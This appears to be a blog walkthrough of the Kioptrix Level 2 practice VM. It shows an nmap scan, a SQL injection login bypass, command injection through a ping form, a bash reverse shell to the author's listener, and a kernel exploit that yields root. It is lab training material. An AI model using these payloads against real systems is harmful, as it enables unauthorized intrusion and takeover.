kioptrix level 2

March 14, 2015

Kioptrix 2 is the second VM in the kioptrix series by @loneferret. You can download it from Vulnhub or the kioptrix website.

As usual I first started off with an nmap scan of the box:

1
2
3
4
5
6
7
8
9
10
11
12
root@kali:~# nmap -Pn -n 10.1.1.33

Nmap scan report for 10.1.1.33
Host is up (0.0051s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql

My first step after seeing port 80 open was to open up a web browser and browse to it. kioptrix login

After a bit of trial and error I found that the page is vulnerable to SQL injection so I entered admin as the username and ' or '1'='1' -- (note the trailing space) as the password and…

kioptrix logged in

Once logged in I was presented with a page that allowed me to ping other machines on the network, so to escape the command to just ping a host I tried inserting a ; after the host: 127.0.0.1; ls -lah which returned a directory listing along with the ping output.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
127.0.0.1; ls -lah
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.056 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.030 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.028 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.028/0.038/0.056/0.012 ms, pipe 2
total 24K
drwxr-xr-x  2 root root 4.0K Oct  8  2009 .
drwxr-xr-x  8 root root 4.0K Oct  7  2009 ..
-rwxr-Sr-t  1 root root 1.7K Feb  9  2012 index.php
-rwxr-Sr-t  1 root root  199 Oct  8  2009 pingit.php

This enabled me to run any commands I liked on the remote machine. So I sent myself back a shell from the remote machine by setting up a listner on my box with nc -lvp 8080 and then executing 127.0.0.1; bash -i >& /dev/tcp/192.168.1.116/8080 0>&1 from the webpage.

1
2
3
4
5
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)

bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux

With this information and after a bit more prodding around on the remote machine I found a kernel exploit, downloaded it to the remote box using wget, compiled it then ran the exploit which returned me a root shell.

1
2
3
4
5
bash-3.00$ gcc -o root root.c
bash-3.00$ ./root
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

How to import the top-hat-sec VMs into VMware

This is a short ‘How-To’ on how to import the [Top-Hat-Sec VMs](https://www.vulnhub.com/series/tophatsec,62/)hosted on VulnHub into VMware …… Continue reading

Kioptrix: Level 1

Published on February 15, 2015

DE-ICE: S1.100

Published on February 04, 2015